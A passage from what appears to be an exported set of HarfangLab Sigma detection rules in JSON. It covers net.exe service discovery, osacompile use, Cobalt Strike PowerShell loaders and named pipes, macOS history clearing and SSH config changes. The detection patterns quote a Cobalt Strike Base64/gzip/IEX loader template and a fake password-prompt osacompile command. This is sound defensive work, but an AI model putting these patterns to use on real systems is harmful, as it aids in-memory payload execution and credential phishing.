'?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\'\n\n exclusion_incotec:\n # https://www.incotec-software.com/\n - CurrentDirectory|contains: '\\Incotec\\Exec\\Bin'\n - Ancestors|contains: '|?:\\Incotec\\UNIX\\bin\\sh.exe|'\n\n exclusion_syracuse:\n - CurrentDirectory|endswith: '\\syracuse\\agent\\'\n - Ancestors|endswith: '\\syracuse\\agent\\Agent.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_egurkha:\n CommandLine: '?:\\Windows\\system32\\net1 start'\n Ancestors|startswith: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\eGurkha\\JRE\\bin\\java.exe|'\n\n exclusion_scripts:\n GrandparentCommandLine:\n - 
'?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*.bat'\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*.cmd'\n Ancestors:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\taskeng.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_oracle:\n GrandparentCommandLine:\n - 'cmd.exe /x/d/c net start | find oracle /i'\n - 'cmd.exe /x/d/c net start | find oracleservice /i'\n Ancestors|contains: '|?:\\Perl64\\bin\\perl.exe|?:\\Windows\\System32\\cmd.exe|'\n\n exclusion_datto:\n Ancestors: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\CentraStage\\CagService.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_hexaflux:\n GrandparentCommandLine: '?:\\Windows\\system32\\cmd.exe /d /s /c net start | findstr Hexaflux'\n Ancestors|endswith: '\\hexaflux\\admin\\\\*|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|?:\\Program Files (x86)\\SAM\\RollCallSuite\\RollProxyConfigurator.exe|'\n - '|?:\\Program Files\\Dell\\SysMgt\\cm\\invcol\\invCol.exe|'\n - '|?:\\eGurkha\\JRE\\bin\\java.exe|'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d5af151-1912-4b7d-aa38-cacd25e43f67",
"rule_name": "System Service Discovered via net.exe",
"rule_description": "Detects the execution of net1.exe with start option.\nAdversaries can use this command during discovery phase to enumerate started system services.\nIt is recommended to investigate the parent process to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e0dad90-5301-41c4-a880-808713de6f5d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618007Z",
"creation_date": "2026-03-23T11:45:34.618009Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/pl_pl/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
"https://attack.mitre.org/techniques/T1059/002/"
],
"name": "t1059_002_osacompile_execution.yml",
"content": "title: Apple Script Compiled via Osacompile\nid: 0e0dad90-5301-41c4-a880-808713de6f5d\ndescription: |\n Detects the execution of osacompile to compile an Apple Script.\n This could be used by an attacker to hide malicious behaviour under a compiled app bundle (ADHOC code signed).\n It is recommended to investigate the program that triggered the compilation and what was compiled to determine whether this action was legitimate.\nreferences:\n - https://www.trendmicro.com/pl_pl/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Osascript\n - classification.macOS.LOLBin.Osacompile\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # osacompile -e 'display dialog \"Password\" default answer \"\" with icon note buttons {\"Cancel\", \"Continue\"} default button \"Continue\"' -o MaliciousApp.app\n selection:\n Image: '/usr/bin/osacompile'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e0dad90-5301-41c4-a880-808713de6f5d",
"rule_name": "Apple Script Compiled via Osacompile",
"rule_description": "Detects the execution of osacompile to compile an Apple Script.\nThis could be used by an attacker to hide malicious behaviour under a compiled app bundle (ADHOC code signed).\nIt is recommended to investigate the program that triggered the compilation and what was compiled to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e0fd26d-b447-4686-acd2-ce93cce97b88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091588Z",
"creation_date": "2026-03-23T11:45:34.091590Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091595Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gchq.github.io/CyberChef/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1059_001_cobalt_powershell_compress.yml",
"content": "title: Cobalt Strike PowerShell Compressed Payload Detected\nid: 0e0fd26d-b447-4686-acd2-ce93cce97b88\ndescription: |\n Detects the execution of a Cobalt Strike standard compressed payload template via PowerShell.\n The goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\n It is recommended to isolate the machine and identify how the script was executed on the host. Tools like CyberChef can be used to decode this payload.\nreferences:\n - https://gchq.github.io/CyberChef/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0154/\ndate: 2021/11/22\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.s0154\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand: '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"*\"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e0fd26d-b447-4686-acd2-ce93cce97b88",
"rule_name": "Cobalt Strike PowerShell Compressed Payload Detected",
"rule_description": "Detects the execution of a Cobalt Strike standard compressed payload template via PowerShell.\nThe goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\nIt is recommended to isolate the machine and identify how the script was executed on the host. Tools like CyberChef can be used to decode this payload.\n",
"rule_creation_date": "2021-11-22",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e12c12e-bea2-428e-ad86-734dcc2aff20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073062Z",
"creation_date": "2026-03-23T11:45:34.073064Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073069Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
"https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/",
"https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8",
"https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752",
"https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_custom_cobaltstrike_named_pipes_created.yml",
"content": "title: Custom CobaltStrike Named Pipe Created\nid: 0e12c12e-bea2-428e-ad86-734dcc2aff20\ndescription: |\n Detects the creation of a Named Pipe pertaining to the CobaltStrike framework.\n These are custom CobaltStrike Named Pipe as seen in previous attacks.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\n - https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8\n - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\n - https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName:\n - '\\mojo.5688.8052.183894939787088877*'\n - '\\mojo.5688.8052.35780273329370473*'\n - '\\scerpc_*'\n - '\\win_svc*'\n - '\\demoagent_11*'\n - '\\demoagent_22*'\n - '\\Winsock2\\CatalogChangeListener-*-0,'\n - '\\wkssvc_??'\n - '\\ntsvcs??'\n - '\\DserNamePipe??'\n - '\\PGMessagePipe??'\n - '\\SearchTextHarvester??'\n - '\\mypipe-f??'\n - '\\mypipe-h??'\n - '\\windows.update.manager??'\n - '\\windows.update.manager???'\n - '\\MsFteWds??'\n - '\\f4c3??'\n - '\\f53f??'\n - '\\fullduplex_??'\n - '\\msrpc_????'\n - 
'\\win\\msrpc_??'\n - '\\rpc_??'\n - '\\spoolss_??'\n # https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - '\\ProtectionManager_????_??'\n - '\\ProtectionManager_??'\n - '\\Winsock2\\\\CatalogChangeListener-???????-1'\n - '\\Winsock2\\\\CatalogChangeListener-??-??'\n - '\\Spool\\\\pipe_????_??'\n - '\\Spool\\\\pipe_??'\n - '\\WkSvcPipeMgr_??????'\n - '\\WkSvcPipeMgr_??'\n - '\\NetClient_??????'\n - '\\NetClient_??'\n - '\\RPC_??????'\n - '\\WiFiNetMgr????_??'\n - '\\WiFiNetMgr_??'\n - '\\AuthPipeD_??'\n\n exclusion_trendmicro:\n PipeName:\n - '\\f4c3??'\n - '\\f53f??'\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\\\*'\n - '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e12c12e-bea2-428e-ad86-734dcc2aff20",
"rule_name": "Custom CobaltStrike Named Pipe Created",
"rule_description": "Detects the creation of a Named Pipe pertaining to the CobaltStrike framework.\nThese are custom CobaltStrike Named Pipes as seen in previous attacks.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598235Z",
"creation_date": "2026-03-23T11:45:34.598241Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598253Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_history_file_removed_macos.yml",
"content": "title: Shell History File Cleared (macOS)\nid: 0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb\ndescription: |\n Detects the history file being removed.\n Attackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\n It is recommended to investigate other malicious actions that may have been taken by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2022/11/25\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Deletion\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_binary1:\n Image:\n - '/bin/rm'\n - '/bin/unlink'\n - '/bin/dd'\n - '/usr/bin/truncate'\n\n selection_binary2:\n Image:\n - '/bin/cat'\n - '/bin/echo'\n CommandLine|contains: \">\"\n\n selection_commandline:\n CommandLine|contains:\n - '.bash_history'\n - 'fish_history'\n - '.history'\n - '.sh_history'\n - '.zhistory'\n - '.zsh_history'\n\n # /bin/rm /Users//.zsh_sessions/.historynew\n exclusion_zsh_sessions:\n Image: '/bin/rm'\n CommandLine|endswith: '.historynew'\n\n exclusion_cursor:\n - GrandparentImage: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin)'\n - ParentImage: '/Applications/Cursor.app/Contents/MacOS/Cursor'\n\n exclusion_vscode:\n ParentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n\n condition: (1 of selection_binary* and selection_commandline) and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb",
"rule_name": "Shell History File Cleared (macOS)",
"rule_description": "Detects a shell history file being removed.\nAttackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\nIt is recommended to investigate other malicious actions that may have been taken by the parent process.\n",
"rule_creation_date": "2022-11-25",
"rule_modified_date": "2025-04-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e4aa7c9-6644-49db-905a-46646475b8a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.726662Z",
"creation_date": "2026-03-23T11:45:35.297664Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297668Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1563/001/",
"https://attack.mitre.org/techniques/T1484/"
],
"name": "t1021_004_ssh_server_config_modified_linux.yml",
"content": "title: Suspicious Modification of the SSH Server Configuration\nid: 0e4aa7c9-6644-49db-905a-46646475b8a2\ndescription: |\n Detects an attempt to modify the SSH server configuration file, which contains security settings.\n Attackers may alter these settings to weaken security.\n It is recommended to review file changes by downloading the file through a job, check access permissions and assess risks from these changes.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/ssh/sshd_config'\n - TargetPath: '/etc/ssh/sshd_config'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_apk:\n - ProcessImage: '/sbin/apk'\n - ProcessParentImage: '/sbin/apk'\n - ProcessGrandparentImage: 
'/sbin/apk'\n - ProcessAncestors|contains: '|/usr/bin/apt|'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - 
ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_denyhost_sshd:\n ProcessCommandLine|startswith: '/usr/bin/perl /usr/sbin/denyhost-sshd-plugin'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n exclusion_docker2:\n ProcessImage|endswith: '/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_puppet:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessParentImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|contains: '/usr/bin/puppet agent'\n\n exclusion_puppet2:\n ProcessParentCommandLine: 'puppet agent: applying configuration'\n\n exclusion_qradar:\n ProcessCommandLine|startswith: '/bin/bash /opt/qradar/bin/post-deploy.sh'\n\n exclusion_puppet3:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e4aa7c9-6644-49db-905a-46646475b8a2",
"rule_name": "Suspicious Modification of the SSH Server Configuration",
"rule_description": "Detects an attempt to modify the SSH server configuration file, which contains security settings.\nAttackers may alter these settings to weaken security.\nIt is recommended to review the file changes by downloading the file through a job, to check its access permissions, and to assess the risks arising from these changes.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1484",
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088331Z",
"creation_date": "2026-03-23T11:45:34.088333Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088337Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
